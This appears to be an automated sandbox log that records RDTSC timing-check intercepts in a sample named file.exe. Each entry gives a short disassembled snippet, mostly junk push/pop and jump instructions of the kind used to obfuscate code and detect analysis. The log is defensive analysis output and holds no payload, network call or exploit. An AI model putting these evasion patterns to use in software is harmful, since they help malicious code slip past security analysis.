Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26D48 second address: F26D7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD25CDB197Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FD25CDB1976h 0x0000001b ja 00007FD25CDB1976h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F26EBF second address: F26EE5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD25C84A62Ch 0x00000008 jbe 00007FD25C84A626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FD25C84A62Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC91DF second address: EC9268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 sub cl, FFFFFF90h 0x0000000b mov ebx, dword ptr [ebp+12478210h] 0x00000011 adc ecx, 1EB6339Fh 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FD25CDB1978h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D343Bh], esi 0x00000039 push eax 0x0000003a jmp 00007FD25CDB197Fh 0x0000003f mov dword ptr [esp], eax 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FD25CDB1978h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c adc edx, 2CE2C14Fh 0x00000062 push 00000004h 0x00000064 add dword ptr [ebp+122D34F3h], esi 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9268 second address: EC9272 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC9272 second address: EC928F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25CDB1989h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC928F second address: EC92AF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD25C84A626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FD25C84A631h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F27311 second address: F27329 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD25CDB1982h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2EFEF second address: F2EFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2EFF5 second address: F2EFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3007F second address: F30083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F30083 second address: F300AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD25CDB1983h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F300AA second address: F300B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD25C84A626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F305FE second address: F3061B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FD25CDB197Ch 0x00000011 je 00007FD25CDB1976h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A270 second address: F3A277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A277 second address: F3A295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25CDB1988h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F393E6 second address: F393EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F393EC second address: F393F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F393F8 second address: F39410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD25C84A626h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD25C84A62Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39410 second address: F39419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39553 second address: F39575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A62Ah 0x00000009 popad 0x0000000a jmp 00007FD25C84A633h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39575 second address: F3959E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1988h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD25CDB197Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3959E second address: F395A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3C58A second address: F3C59E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44C11 second address: F44C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43175 second address: F4317B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4317B second address: F43199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FD25C84A639h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43199 second address: F4319E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4319E second address: F431B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A631h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4334E second address: F43365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD25CDB1980h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F435C5 second address: F435C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F435C9 second address: F435CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F435CD second address: F435D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F435D7 second address: F435FE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD25CDB1976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD25CDB1986h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F438BB second address: F438D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD25C84A628h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007FD25C84A62Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F438D3 second address: F438D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43A39 second address: F43A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007FD25C84A628h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43A46 second address: F43A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB197Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD25CDB1982h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43A66 second address: F43A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43BB1 second address: F43BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F442EB second address: F442EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F442EF second address: F442F9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD25CDB1982h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F442F9 second address: F44306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD25C84A626h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44306 second address: F4430C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4430C second address: F44322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD25C84A626h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jne 00007FD25C84A62Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44322 second address: F44338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD25CDB1980h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42903 second address: F42925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD25C84A626h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD25C84A635h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A430 second address: F4A437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A437 second address: F4A46C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FD25C84A626h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FD25C84A631h 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007FD25C84A626h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007FD25C84A628h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A46C second address: F4A478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FD25CDB1976h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A478 second address: F4A495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A639h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A495 second address: F4A4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FD25CDB1976h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A61D second address: F4A63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD25C84A626h 0x0000000a jmp 00007FD25C84A630h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58B3D second address: F58B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58B43 second address: F58B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5882F second address: F58834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58834 second address: F58851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A62Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FD25C84A626h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5B152 second address: F5B161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jg 00007FD25CDB1976h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62639 second address: F6263F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69D86 second address: F69D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69D8A second address: F69D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC82 second address: F6BC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC88 second address: F6BCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD25C84A634h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FD25C84A62Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BCB6 second address: F6BCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BCBA second address: F6BCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD25C84A637h 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FD25C84A626h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74E3D second address: F74E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD25CDB1976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F737D2 second address: F737D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73AD5 second address: F73AE5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD25CDB197Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73C3E second address: F73C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8AFC8 second address: E8AFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8AFCE second address: E8AFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8AFD2 second address: E8AFDC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD25CDB1976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73D8E second address: F73D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7403E second address: F74047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74047 second address: F7404D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74B01 second address: F74B11 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD25CDB1976h 0x00000008 js 00007FD25CDB1976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74B11 second address: F74B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD25C84A62Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 jnp 00007FD25C84A62Ch 0x00000018 jl 00007FD25C84A626h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD25C84A638h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74B52 second address: F74B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78A16 second address: F78A32 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD25C84A626h 0x00000008 jmp 00007FD25C84A632h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78A32 second address: F78A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25CDB1986h 0x00000009 jc 00007FD25CDB1976h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7871E second address: F78725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78725 second address: F78747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1986h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FD25CDB1976h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F78747 second address: F7874B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7874B second address: F7874F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F79F9A second address: F79FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD25C84A636h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83ED6 second address: F83EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EDA second address: F83EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83EE0 second address: F83EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B5E6 second address: F8B605 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD25C84A628h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD25C84A62Ch 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B605 second address: F8B615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD25CDB1976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B615 second address: F8B63D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25C84A637h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98DF1 second address: F98DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98DFE second address: F98E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98E02 second address: F98E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD25CDB1987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FD25CDB1985h 0x00000011 jg 00007FD25CDB1976h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98B11 second address: F98B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF7CE second address: FAF7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD25CDB1976h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF7D9 second address: FAF7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD25C84A62Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB42AC second address: FB42B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB324B second address: FB324F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB324F second address: FB3255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
